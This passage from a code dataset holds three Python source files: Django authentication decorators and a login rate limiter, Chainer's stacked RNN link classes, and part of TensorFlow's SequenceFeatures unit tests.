response = _has_only_invalidated_emails(request)
if response:
return response
_has_invalidated_emails_add_warning(request)
rpconfig = get_rpconfig_from_request(request, None)
u = request.user
required = (
require_twofactor or
twofactor.user_requires_twofactor_auth(request, u) or
twofactor.site_requires_twofactor_auth(request, None, rpconfig)
)
require_auth = (
(required and not twofactor.is_upgraded(request)) or
(require_twofactor_freshness and
not twofactor.is_fresh(request))
)
if require_auth:
# only valid reverse arg is token
reverse_args = {}
if 'token' in kwargs and kwargs['token'] is not None:
reverse_args['token'] = kwargs['token']
return redirect_to_login(
request.get_full_path(),
reverse('twofactor', kwargs=reverse_args),
redirect_field_name,
)
return view_func(request, *args, **kwargs)
return django_login_required(
_wrapped_view, redirect_field_name, login_url,
)
if function:
return decorator(function)
return decorator
def check_readonly(func):
"""A readonly aware decorator.
The decorated view will not be accessible at all during readonly mode.
Instead, a static warning page will be displayed.
"""
def wrapper(request, *args, **kwargs):
if settings.READ_ONLY_MODE:
html = render_to_string(
'readonly.html',
{'readonly': False},
context_instance=RequestContext(request)
)
return HttpResponseForbidden(html)
return func(request, *args, **kwargs)
functools.update_wrapper(wrapper, func)
return wrapper
disable_cookie_check = False
def requires_cookies(func):
@functools.wraps(func)
def wrapper(request, *args, **kwargs):
if disable_cookie_check or test_cookie_worked(request):
return func(request, *args, **kwargs)
quoted = urlencode({'next': request.get_full_path()})
return set_test_cookie(HttpResponseRedirect('/+cookie?' + quoted))
return wrapper
def require_twofactor_enabled(func):
@wraps(func)
def wrapped(request, *args, **kwargs):
if not twofactor.is_twofactor_enabled(request):
raise Http404('Switch \'TWOFACTOR\' is not active')
return func(request, *args, **kwargs)
return wrapped
class ratelimit(object):
""" A rate-limiting decorator.
Strongly based on Simon Willison's code,
http://github.com/simonw/ratelimitcache/blob/master/ratelimitcache.py
"""
# This class is designed to be sub-classed
minutes = 2 # The time period
requests = 20 # Number of allowed requests in that time period
prefix = 'rl-' # Prefix for memcache key
def __init__(self, **options):
# explicitly setting the name to pretend we're a function to allow this
# decorator to work like with django's method_decorator function
self.__name__ = self.__class__.__name__
for key, value in options.items():
setattr(self, key, value)
def __call__(self, fn):
def wrapper(request, *args, **kwargs):
return self.view_wrapper(request, fn, *args, **kwargs)
functools.update_wrapper(wrapper, fn)
return wrapper
def view_wrapper(self, request, fn, *args, **kwargs):
if not self.should_ratelimit(request):
return fn(request, *args, **kwargs)
counts = self.get_counters(request).values()
# Increment rate limiting counter
self.cache_incr(self.current_key(request))
# Have they failed?
if sum(int(x) for x in counts) >= self.requests:
return self.disallowed(request)
return fn(request, *args, **kwargs)
def cache_get_many(self, keys):
return cache.get_many(keys)
def cache_incr(self, key):
# memcache is only backend that can increment atomically
try:
# add first, to ensure the key exists
cache.add(key, 0, timeout=self.expire_after())
cache.incr(key)
except AttributeError:
cache.set(key, cache.get(key, 0) + 1, self.expire_after())
def should_ratelimit(self, request):
return True
def get_counters(self, request):
return self.cache_get_many(self.keys_to_check(request))
def keys_to_check(self, request):
extra = self.key_extra(request)
now = datetime.utcnow()
return [
'%s%s-%s' % (
self.prefix,
extra,
(now - timedelta(minutes=minute)).strftime('%Y%m%d%H%M')
) for minute in range(self.minutes + 1)
]
def current_key(self, request):
return '%s%s-%s' % (
self.prefix,
self.key_extra(request),
datetime.utcnow().strftime('%Y%m%d%H%M')
)
def remote_ip(self, request):
if 'HTTP_X_FORWARDED_FOR' in request.META:
remote_ip = request.META['HTTP_X_FORWARDED_FOR']
# Because X-Forwarded-For can be a list of IP's we need only one
remote_ip = remote_ip.split(',')[0].strip()
else:
remote_ip = request.META.get('REMOTE_ADDR')
return remote_ip
def key_extra(self, request):
# By default, their IP address is used
return self.remote_ip(request)
def disallowed(self, request):
remote_ip = self.remote_ip(request)
logger = logging.getLogger('ratelimit.disallowed')
def _get_name(user):
try:
return user.openid_identifier
except AttributeError:
return user.username
logger.warn("%s (%s) exceeded rate limit for %s",
_get_name(request.user), remote_ip, request.user.id)
return HttpResponseForbidden(render_to_string('limitexceeded.html'))
def expire_after(self):
"Used for setting the memcached cache expiry"
return (self.minutes + 1) * 60
def reset_count(self, request):
"Reset the rate limiting limit count for a request"
for key in self.keys_to_check(request):
cache.delete(key)
class ratelimit_post(ratelimit):
"Rate limit POSTs - can be used to protect a login form"
key_field = None # If provided, this POST var will affect the rate limit
def should_ratelimit(self, request):
return request.method == 'POST'
def key_extra(self, request):
# IP address and key_field (if it is set)
extra = super(ratelimit_post, self).key_extra(request)
if self.key_field:
value = sha1(request.POST.get(self.key_field, '').encode('utf-8'))
extra += '-' + value.hexdigest()
return extra
class limitlogin(ratelimit_post):
"""Limit login POSTs, per username.
Also, take default values from settings.
"""
key_field = 'email'
def __init__(self, **options):
args = {
'minutes': getattr(settings, 'LOGIN_LIMIT_MINUTES', 2),
'requests': getattr(settings, 'LOGIN_LIMIT_REQUESTS', 20),
}
args.update(options)
super(limitlogin, self).__init__(**args)
| agpl-3.0 | 2,584,166,348,463,007,000 | 33.464968 | 79 | 0.622343 | false |
ktnyt/chainer | chainer/links/connection/n_step_rnn.py | 1 | 12945 | import numpy
import six
import chainer
from chainer.functions.array import permutate
from chainer.functions.array import transpose_sequence
from chainer.functions.connection import n_step_rnn as rnn
from chainer.initializers import normal
from chainer import link
from chainer.utils import argument
from chainer import variable
def argsort_list_descent(lst):
return numpy.argsort([-len(x) for x in lst]).astype(numpy.int32)
def permutate_list(lst, indices, inv):
ret = [None] * len(lst)
if inv:
for i, ind in enumerate(indices):
ret[ind] = lst[i]
else:
for i, ind in enumerate(indices):
ret[i] = lst[ind]
return ret
class NStepRNNBase(link.ChainList):
"""__init__(self, n_layers, in_size, out_size, dropout)
Base link class for Stacked RNN/BiRNN links.
This link is base link class for :func:`chainer.links.NStepRNN` and
:func:`chainer.links.NStepBiRNN`.
This link's behavior depends on argument, ``use_bi_direction``.
.. warning::
``use_cudnn`` argument is not supported anymore since v2.
Instead, use ``chainer.using_config('use_cudnn', use_cudnn)``.
See :func:`chainer.using_config`.
Args:
n_layers (int): Number of layers.
in_size (int): Dimensionality of input vectors.
out_size (int): Dimensionality of hidden states and output vectors.
dropout (float): Dropout ratio.
.. seealso::
:func:`chainer.links.NStepRNNReLU`
:func:`chainer.links.NStepRNNTanh`
:func:`chainer.links.NStepBiRNNReLU`
:func:`chainer.links.NStepBiRNNTanh`
""" # NOQA
def __init__(self, n_layers, in_size, out_size, dropout, **kwargs):
if kwargs:
argument.check_unexpected_kwargs(
kwargs,
use_cudnn='use_cudnn argument is not supported anymore. '
'Use chainer.using_config',
use_bi_direction='use_bi_direction is not supported anymore',
activation='activation is not supported anymore')
argument.assert_kwargs_empty(kwargs)
weights = []
if self.use_bi_direction:
direction = 2
else:
direction = 1
for i in six.moves.range(n_layers):
for di in six.moves.range(direction):
weight = link.Link()
with weight.init_scope():
for j in six.moves.range(self.n_weights):
if i == 0 and j < self.n_weights // 2:
w_in = in_size
elif i > 0 and j < self.n_weights // 2:
w_in = out_size * direction
else:
w_in = out_size
w = variable.Parameter(
normal.Normal(numpy.sqrt(1. / w_in)),
(out_size, w_in))
b = variable.Parameter(0, (out_size,))
setattr(weight, 'w%d' % j, w)
setattr(weight, 'b%d' % j, b)
weights.append(weight)
super(NStepRNNBase, self).__init__(*weights)
self.ws = [[getattr(layer, 'w%d' % i)
for i in six.moves.range(self.n_weights)]
for layer in self]
self.bs = [[getattr(layer, 'b%d' % i)
for i in six.moves.range(self.n_weights)]
for layer in self]
self.n_layers = n_layers
self.dropout = dropout
self.out_size = out_size
self.direction = direction
def init_hx(self, xs):
shape = (self.n_layers * self.direction, len(xs), self.out_size)
with chainer.using_device(self.device):
hx = variable.Variable(self.xp.zeros(shape, dtype=xs[0].dtype))
return hx
def rnn(self, *args):
"""Calls RNN function.
This function must be implemented in a child class.
"""
raise NotImplementedError
@property
def n_cells(self):
"""Returns the number of cells.
This function must be implemented in a child class.
"""
return NotImplementedError
def forward(self, hx, xs, **kwargs):
"""forward(self, hx, xs)
Calculate all hidden states and cell states.
.. warning::
``train`` argument is not supported anymore since v2.
Instead, use ``chainer.using_config('train', train)``.
See :func:`chainer.using_config`.
Args:
hx (~chainer.Variable or None): Initial hidden states. If ``None``
is specified zero-vector is used. Its shape is ``(S, B, N)``
for uni-directional RNN and ``(2S, B, N)`` for
bi-directional RNN where ``S`` is the number of layers
and is equal to ``n_layers``, ``B`` is the mini-batch size,
and ``N`` is the dimension of the hidden units.
xs (list of ~chainer.Variable): List of input sequences.
Each element ``xs[i]`` is a :class:`chainer.Variable` holding
a sequence. Its shape is ``(L_t, I)``, where ``L_t`` is the
length of a sequence for time ``t``, and ``I`` is the size of
the input and is equal to ``in_size``.
Returns:
tuple: This function returns a tuple containing three elements,
``hy`` and ``ys``.
- ``hy`` is an updated hidden states whose shape is same as ``hx``.
- ``ys`` is a list of :class:`~chainer.Variable` . Each element
``ys[t]`` holds hidden states of the last layer corresponding
to an input ``xs[t]``. Its shape is ``(L_t, N)`` for
uni-directional RNN and ``(L_t, 2N)`` for bi-directional RNN
where ``L_t`` is the length of a sequence for time ``t``,
and ``N`` is size of hidden units.
"""
(hy,), ys = self._call([hx], xs, **kwargs)
return hy, ys
def _call(self, hs, xs, **kwargs):
"""Calls RNN function.
Args:
hs (list of ~chainer.Variable or None): Lisit of hidden states.
Its length depends on its implementation.
If ``None`` is specified zero-vector is used.
xs (list of ~chainer.Variable): List of input sequences.
Each element ``xs[i]`` is a :class:`chainer.Variable` holding
a sequence.
Returns:
tuple: hs
"""
if kwargs:
argument.check_unexpected_kwargs(
kwargs, train='train argument is not supported anymore. '
'Use chainer.using_config')
argument.assert_kwargs_empty(kwargs)
assert isinstance(xs, (list, tuple))
indices = argsort_list_descent(xs)
xs = permutate_list(xs, indices, inv=False)
hxs = []
for hx in hs:
if hx is None:
hx = self.init_hx(xs)
else:
hx = permutate.permutate(hx, indices, axis=1, inv=False)
hxs.append(hx)
trans_x = transpose_sequence.transpose_sequence(xs)
args = [self.n_layers, self.dropout] + hxs + \
[self.ws, self.bs, trans_x]
result = self.rnn(*args)
hys = [permutate.permutate(h, indices, axis=1, inv=True)
for h in result[:-1]]
trans_y = result[-1]
ys = transpose_sequence.transpose_sequence(trans_y)
ys = permutate_list(ys, indices, inv=True)
return hys, ys
class NStepRNNTanh(NStepRNNBase):
"""__init__(self, n_layers, in_size, out_size, dropout)
Stacked Uni-directional RNN for sequences.
This link is stacked version of Uni-directional RNN for sequences.
Note that the activation function is ``tanh``.
It calculates hidden and cell states of all layer at end-of-string,
and all hidden states of the last layer for each time.
Unlike :func:`chainer.functions.n_step_rnn`, this function automatically
sort inputs in descending order by length, and transpose the sequence.
Users just need to call the link with a list of :class:`chainer.Variable`
holding sequences.
.. warning::
``use_cudnn`` argument is not supported anymore since v2.
Instead, use ``chainer.using_config('use_cudnn', use_cudnn)``.
See :func:`chainer.using_config`.
Args:
n_layers (int): Number of layers.
in_size (int): Dimensionality of input vectors.
out_size (int): Dimensionality of hidden states and output vectors.
dropout (float): Dropout ratio.
.. seealso::
:func:`chainer.functions.n_step_rnn`
"""
n_weights = 2
use_bi_direction = False
def rnn(self, *args):
return rnn.n_step_rnn(*args, activation='tanh')
@property
def n_cells(self):
return 1
class NStepRNNReLU(NStepRNNBase):
"""__init__(self, n_layers, in_size, out_size, dropout)
Stacked Uni-directional RNN for sequences.
This link is stacked version of Uni-directional RNN for sequences.
Note that the activation function is ``relu``.
It calculates hidden and cell states of all layer at end-of-string,
and all hidden states of the last layer for each time.
Unlike :func:`chainer.functions.n_step_rnn`, this function automatically
sort inputs in descending order by length, and transpose the sequence.
Users just need to call the link with a list of :class:`chainer.Variable`
holding sequences.
.. warning::
``use_cudnn`` argument is not supported anymore since v2.
Instead, use ``chainer.using_config('use_cudnn', use_cudnn)``.
See :func:`chainer.using_config`.
Args:
n_layers (int): Number of layers.
in_size (int): Dimensionality of input vectors.
out_size (int): Dimensionality of hidden states and output vectors.
dropout (float): Dropout ratio.
.. seealso::
:func:`chainer.functions.n_step_rnn`
"""
n_weights = 2
use_bi_direction = False
def rnn(self, *args):
return rnn.n_step_rnn(*args, activation='relu')
@property
def n_cells(self):
return 1
class NStepBiRNNTanh(NStepRNNBase):
"""__init__(self, n_layers, in_size, out_size, dropout)
Stacked Bi-directional RNN for sequences.
This link is stacked version of Bi-directional RNN for sequences.
Note that the activation function is ``tanh``.
It calculates hidden and cell states of all layer at end-of-string,
and all hidden states of the last layer for each time.
Unlike :func:`chainer.functions.n_step_birnn`, this function automatically
sort inputs in descending order by length, and transpose the sequence.
Users just need to call the link with a list of :class:`chainer.Variable`
holding sequences.
.. warning::
``use_cudnn`` argument is not supported anymore since v2.
Instead, use ``chainer.using_config('use_cudnn', use_cudnn)``.
See :func:`chainer.using_config`.
Args:
n_layers (int): Number of layers.
in_size (int): Dimensionality of input vectors.
out_size (int): Dimensionality of hidden states and output vectors.
dropout (float): Dropout ratio.
.. seealso::
:func:`chainer.functions.n_step_birnn`
"""
n_weights = 2
use_bi_direction = True
def rnn(self, *args):
return rnn.n_step_birnn(*args, activation='tanh')
@property
def n_cells(self):
return 1
class NStepBiRNNReLU(NStepRNNBase):
"""__init__(self, n_layers, in_size, out_size, dropout)
Stacked Bi-directional RNN for sequences.
This link is stacked version of Bi-directional RNN for sequences.
Note that the activation function is ``relu``.
It calculates hidden and cell states of all layer at end-of-string,
and all hidden states of the last layer for each time.
Unlike :func:`chainer.functions.n_step_birnn`, this function automatically
sort inputs in descending order by length, and transpose the sequence.
Users just need to call the link with a list of :class:`chainer.Variable`
holding sequences.
.. warning::
``use_cudnn`` argument is not supported anymore since v2.
Instead, use ``chainer.using_config('use_cudnn', use_cudnn)``.
See :func:`chainer.using_config`.
Args:
n_layers (int): Number of layers.
in_size (int): Dimensionality of input vectors.
out_size (int): Dimensionality of hidden states and output vectors.
dropout (float): Dropout ratio.
.. seealso::
:func:`chainer.functions.n_step_birnn`
"""
n_weights = 2
use_bi_direction = True
def rnn(self, *args):
return rnn.n_step_birnn(*args, activation='relu')
@property
def n_cells(self):
return 1
| mit | 7,793,916,110,784,992,000 | 32.710938 | 79 | 0.594515 | false |
jendap/tensorflow | tensorflow/contrib/feature_column/python/feature_column/sequence_feature_column_v2_test.py | 2 | 61575 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for sequential_feature_column."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl.testing import parameterized
import numpy as np
from tensorflow.contrib.feature_column.python.feature_column import sequence_feature_column_v2 as sfc
from tensorflow.python.feature_column import feature_column_lib as fc
from tensorflow.python.feature_column.feature_column_v2_test import _TestStateManager
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import test
from tensorflow.python.training import monitored_session
class SequenceFeaturesTest(test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
{'testcase_name': '2D',
'sparse_input_args_a': {
# example 0, ids [2]
# example 1, ids [0, 1]
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (2, 0, 1),
'dense_shape': (2, 2)},
'sparse_input_args_b': {
# example 0, ids [1]
# example 1, ids [2, 0]
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (1, 2, 0),
'dense_shape': (2, 2)},
'expected_input_layer': [
# example 0, ids_a [2], ids_b [1]
[[5., 6., 14., 15., 16.], [0., 0., 0., 0., 0.]],
# example 1, ids_a [0, 1], ids_b [2, 0]
[[1., 2., 17., 18., 19.], [3., 4., 11., 12., 13.]],],
'expected_sequence_length': [1, 2]},
{'testcase_name': '3D',
'sparse_input_args_a': {
# feature 0, ids [[2], [0, 1]]
# feature 1, ids [[0, 0], [1]]
'indices': (
(0, 0, 0), (0, 1, 0), (0, 1, 1),
(1, 0, 0), (1, 0, 1), (1, 1, 0)),
'values': (2, 0, 1, 0, 0, 1),
'dense_shape': (2, 2, 2)},
'sparse_input_args_b': {
# feature 0, ids [[1, 1], [1]]
# feature 1, ids [[2], [0]]
'indices': ((0, 0, 0), (0, 0, 1), (0, 1, 0), (1, 0, 0), (1, 1, 0)),
'values': (1, 1, 1, 2, 0),
'dense_shape': (2, 2, 2)},
'expected_input_layer': [
# feature 0, [a: 2, -, b: 1, 1], [a: 0, 1, b: 1, -]
[[5., 6., 14., 15., 16.], [2., 3., 14., 15., 16.]],
# feature 1, [a: 0, 0, b: 2, -], [a: 1, -, b: 0, -]
[[1., 2., 17., 18., 19.], [3., 4., 11., 12., 13.]]],
'expected_sequence_length': [2, 2]},
)
def test_embedding_column(
self, sparse_input_args_a, sparse_input_args_b, expected_input_layer,
expected_sequence_length):
sparse_input_a = sparse_tensor.SparseTensorValue(**sparse_input_args_a)
sparse_input_b = sparse_tensor.SparseTensorValue(**sparse_input_args_b)
vocabulary_size = 3
embedding_dimension_a = 2
embedding_values_a = (
(1., 2.), # id 0
(3., 4.), # id 1
(5., 6.) # id 2
)
embedding_dimension_b = 3
embedding_values_b = (
(11., 12., 13.), # id 0
(14., 15., 16.), # id 1
(17., 18., 19.) # id 2
)
def _get_initializer(embedding_dimension, embedding_values):
def _initializer(shape, dtype, partition_info):
self.assertAllEqual((vocabulary_size, embedding_dimension), shape)
self.assertEqual(dtypes.float32, dtype)
self.assertIsNone(partition_info)
return embedding_values
return _initializer
categorical_column_a = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
embedding_column_a = fc.embedding_column(
categorical_column_a,
dimension=embedding_dimension_a,
initializer=_get_initializer(embedding_dimension_a, embedding_values_a))
categorical_column_b = sfc.sequence_categorical_column_with_identity(
key='bbb', num_buckets=vocabulary_size)
embedding_column_b = fc.embedding_column(
categorical_column_b,
dimension=embedding_dimension_b,
initializer=_get_initializer(embedding_dimension_b, embedding_values_b))
# Test that columns are reordered alphabetically.
sequence_input_layer = sfc.SequenceFeatures(
[embedding_column_b, embedding_column_a])
input_layer, sequence_length = sequence_input_layer({
'aaa': sparse_input_a, 'bbb': sparse_input_b,})
global_vars = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertCountEqual(
('sequence_features/aaa_embedding/embedding_weights:0',
'sequence_features/bbb_embedding/embedding_weights:0'),
tuple([v.name for v in global_vars]))
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(embedding_values_a, global_vars[0].eval(session=sess))
self.assertAllEqual(embedding_values_b, global_vars[1].eval(session=sess))
self.assertAllEqual(expected_input_layer, input_layer.eval(session=sess))
self.assertAllEqual(
expected_sequence_length, sequence_length.eval(session=sess))
def test_embedding_column_with_non_sequence_categorical(self):
"""Tests that error is raised for non-sequence embedding column."""
vocabulary_size = 3
sparse_input = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
indices=((0, 0), (1, 0), (1, 1)),
values=(2, 0, 1),
dense_shape=(2, 2))
categorical_column_a = fc.categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
embedding_column_a = fc.embedding_column(
categorical_column_a, dimension=2)
with self.assertRaisesRegexp(
ValueError,
r'In embedding_column: aaa_embedding\. categorical_column must be of '
r'type SequenceCategoricalColumn to use SequenceFeatures\.'):
sequence_input_layer = sfc.SequenceFeatures([embedding_column_a])
_, _ = sequence_input_layer({'aaa': sparse_input})
def test_shared_embedding_column(self):
vocabulary_size = 3
sparse_input_a = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
indices=((0, 0), (1, 0), (1, 1)),
values=(2, 0, 1),
dense_shape=(2, 2))
sparse_input_b = sparse_tensor.SparseTensorValue(
# example 0, ids [1]
# example 1, ids [2, 0]
indices=((0, 0), (1, 0), (1, 1)),
values=(1, 2, 0),
dense_shape=(2, 2))
embedding_dimension = 2
embedding_values = (
(1., 2.), # id 0
(3., 4.), # id 1
(5., 6.) # id 2
)
def _get_initializer(embedding_dimension, embedding_values):
def _initializer(shape, dtype, partition_info):
self.assertAllEqual((vocabulary_size, embedding_dimension), shape)
self.assertEqual(dtypes.float32, dtype)
self.assertIsNone(partition_info)
return embedding_values
return _initializer
expected_input_layer = [
# example 0, ids_a [2], ids_b [1]
[[5., 6., 3., 4.], [0., 0., 0., 0.]],
# example 1, ids_a [0, 1], ids_b [2, 0]
[[1., 2., 5., 6.], [3., 4., 1., 2.]],
]
expected_sequence_length = [1, 2]
categorical_column_a = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
categorical_column_b = sfc.sequence_categorical_column_with_identity(
key='bbb', num_buckets=vocabulary_size)
# Test that columns are reordered alphabetically.
shared_embedding_columns = fc.shared_embedding_columns_v2(
[categorical_column_b, categorical_column_a],
dimension=embedding_dimension,
initializer=_get_initializer(embedding_dimension, embedding_values))
sequence_input_layer = sfc.SequenceFeatures(shared_embedding_columns)
input_layer, sequence_length = sequence_input_layer({
'aaa': sparse_input_a, 'bbb': sparse_input_b})
global_vars = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertCountEqual(
('aaa_bbb_shared_embedding:0',),
tuple([v.name for v in global_vars]))
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(embedding_values, global_vars[0].eval(session=sess))
self.assertAllEqual(expected_input_layer, input_layer.eval(session=sess))
self.assertAllEqual(
expected_sequence_length, sequence_length.eval(session=sess))
def test_shared_embedding_column_with_non_sequence_categorical(self):
"""Tests that error is raised for non-sequence shared embedding column."""
vocabulary_size = 3
sparse_input_a = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
indices=((0, 0), (1, 0), (1, 1)),
values=(2, 0, 1),
dense_shape=(2, 2))
sparse_input_b = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
indices=((0, 0), (1, 0), (1, 1)),
values=(2, 0, 1),
dense_shape=(2, 2))
categorical_column_a = fc.categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
categorical_column_b = fc.categorical_column_with_identity(
key='bbb', num_buckets=vocabulary_size)
shared_embedding_columns = fc.shared_embedding_columns_v2(
[categorical_column_a, categorical_column_b], dimension=2)
with self.assertRaisesRegexp(
ValueError,
r'In embedding_column: aaa_shared_embedding\. categorical_column must '
r'be of type SequenceCategoricalColumn to use SequenceFeatures\.'):
sequence_input_layer = sfc.SequenceFeatures(shared_embedding_columns)
_, _ = sequence_input_layer({'aaa': sparse_input_a,
'bbb': sparse_input_b})
@parameterized.named_parameters(
{'testcase_name': '2D',
'sparse_input_args_a': {
# example 0, ids [2]
# example 1, ids [0, 1]
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (2, 0, 1),
'dense_shape': (2, 2)},
'sparse_input_args_b': {
# example 0, ids [1]
# example 1, ids [1, 0]
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (1, 1, 0),
'dense_shape': (2, 2)},
'expected_input_layer': [
# example 0, ids_a [2], ids_b [1]
[[0., 0., 1., 0., 1.], [0., 0., 0., 0., 0.]],
# example 1, ids_a [0, 1], ids_b [1, 0]
[[1., 0., 0., 0., 1.], [0., 1., 0., 1., 0.]]],
'expected_sequence_length': [1, 2]},
{'testcase_name': '3D',
'sparse_input_args_a': {
# feature 0, ids [[2], [0, 1]]
# feature 1, ids [[0, 0], [1]]
'indices': (
(0, 0, 0), (0, 1, 0), (0, 1, 1),
(1, 0, 0), (1, 0, 1), (1, 1, 0)),
'values': (2, 0, 1, 0, 0, 1),
'dense_shape': (2, 2, 2)},
'sparse_input_args_b': {
# feature 0, ids [[1, 1], [1]]
# feature 1, ids [[1], [0]]
'indices': ((0, 0, 0), (0, 0, 1), (0, 1, 0), (1, 0, 0), (1, 1, 0)),
'values': (1, 1, 1, 1, 0),
'dense_shape': (2, 2, 2)},
'expected_input_layer': [
# feature 0, [a: 2, -, b: 1, 1], [a: 0, 1, b: 1, -]
[[0., 0., 1., 0., 2.], [1., 1., 0., 0., 1.]],
# feature 1, [a: 0, 0, b: 1, -], [a: 1, -, b: 0, -]
[[2., 0., 0., 0., 1.], [0., 1., 0., 1., 0.]]],
'expected_sequence_length': [2, 2]},
)
def test_indicator_column(
self, sparse_input_args_a, sparse_input_args_b, expected_input_layer,
expected_sequence_length):
sparse_input_a = sparse_tensor.SparseTensorValue(**sparse_input_args_a)
sparse_input_b = sparse_tensor.SparseTensorValue(**sparse_input_args_b)
vocabulary_size_a = 3
vocabulary_size_b = 2
categorical_column_a = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size_a)
indicator_column_a = fc.indicator_column(categorical_column_a)
categorical_column_b = sfc.sequence_categorical_column_with_identity(
key='bbb', num_buckets=vocabulary_size_b)
indicator_column_b = fc.indicator_column(categorical_column_b)
# Test that columns are reordered alphabetically.
sequence_input_layer = sfc.SequenceFeatures(
[indicator_column_b, indicator_column_a])
input_layer, sequence_length = sequence_input_layer({
'aaa': sparse_input_a, 'bbb': sparse_input_b})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(expected_input_layer, input_layer.eval(session=sess))
self.assertAllEqual(
expected_sequence_length, sequence_length.eval(session=sess))
def test_indicator_column_with_non_sequence_categorical(self):
"""Tests that error is raised for non-sequence categorical column."""
vocabulary_size = 3
sparse_input = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
indices=((0, 0), (1, 0), (1, 1)),
values=(2, 0, 1),
dense_shape=(2, 2))
categorical_column_a = fc.categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
indicator_column_a = fc.indicator_column(categorical_column_a)
with self.assertRaisesRegexp(
ValueError,
r'In indicator_column: aaa_indicator\. categorical_column must be of '
r'type SequenceCategoricalColumn to use SequenceFeatures\.'):
sequence_input_layer = sfc.SequenceFeatures([indicator_column_a])
_, _ = sequence_input_layer({'aaa': sparse_input})
@parameterized.named_parameters(
{'testcase_name': '2D',
'sparse_input_args': {
# example 0, values [0., 1]
# example 1, [10.]
'indices': ((0, 0), (0, 1), (1, 0)),
'values': (0., 1., 10.),
'dense_shape': (2, 2)},
'expected_input_layer': [
[[0.], [1.]],
[[10.], [0.]]],
'expected_sequence_length': [2, 1]},
{'testcase_name': '3D',
'sparse_input_args': {
# feature 0, ids [[20, 3], [5]]
# feature 1, ids [[3], [8]]
'indices': ((0, 0, 0), (0, 0, 1), (0, 1, 0), (1, 0, 0), (1, 1, 0)),
'values': (20., 3., 5., 3., 8.),
'dense_shape': (2, 2, 2)},
'expected_input_layer': [
[[20.], [3.], [5.], [0.]],
[[3.], [0.], [8.], [0.]]],
'expected_sequence_length': [2, 2]},
)
def test_numeric_column(
self, sparse_input_args, expected_input_layer, expected_sequence_length):
sparse_input = sparse_tensor.SparseTensorValue(**sparse_input_args)
numeric_column = sfc.sequence_numeric_column('aaa')
sequence_input_layer = sfc.SequenceFeatures([numeric_column])
input_layer, sequence_length = sequence_input_layer({'aaa': sparse_input})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(expected_input_layer, input_layer.eval(session=sess))
self.assertAllEqual(
expected_sequence_length, sequence_length.eval(session=sess))
@parameterized.named_parameters(
{'testcase_name': '2D',
'sparse_input_args': {
# example 0, values [0., 1., 2., 3., 4., 5., 6., 7.]
# example 1, [10., 11., 12., 13.]
'indices': ((0, 0), (0, 1), (0, 2), (0, 3), (0, 4), (0, 5), (0, 6),
(0, 7), (1, 0), (1, 1), (1, 2), (1, 3)),
'values': (0., 1., 2., 3., 4., 5., 6., 7., 10., 11., 12., 13.),
'dense_shape': (2, 8)},
'expected_input_layer': [
# The output of numeric_column._get_dense_tensor should be flattened.
[[0., 1., 2., 3.], [4., 5., 6., 7.]],
[[10., 11., 12., 13.], [0., 0., 0., 0.]]],
'expected_sequence_length': [2, 1]},
{'testcase_name': '3D',
'sparse_input_args': {
# example 0, values [[0., 1., 2., 3.]], [[4., 5., 6., 7.]]
# example 1, [[10., 11., 12., 13.], []]
'indices': ((0, 0, 0), (0, 0, 1), (0, 0, 2), (0, 0, 3),
(0, 1, 0), (0, 1, 1), (0, 1, 2), (0, 1, 3),
(1, 0, 0), (1, 0, 1), (1, 0, 2), (1, 0, 3)),
'values': (0., 1., 2., 3., 4., 5., 6., 7., 10., 11., 12., 13.),
'dense_shape': (2, 2, 4)},
'expected_input_layer': [
# The output of numeric_column._get_dense_tensor should be flattened.
[[0., 1., 2., 3.], [4., 5., 6., 7.]],
[[10., 11., 12., 13.], [0., 0., 0., 0.]]],
'expected_sequence_length': [2, 1]},
)
def test_numeric_column_multi_dim(
self, sparse_input_args, expected_input_layer, expected_sequence_length):
"""Tests SequenceFeatures for multi-dimensional numeric_column."""
sparse_input = sparse_tensor.SparseTensorValue(**sparse_input_args)
numeric_column = sfc.sequence_numeric_column('aaa', shape=(2, 2))
sequence_input_layer = sfc.SequenceFeatures([numeric_column])
input_layer, sequence_length = sequence_input_layer({'aaa': sparse_input})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(expected_input_layer, input_layer.eval(session=sess))
self.assertAllEqual(
expected_sequence_length, sequence_length.eval(session=sess))
def test_sequence_length_not_equal(self):
"""Tests that an error is raised when sequence lengths are not equal."""
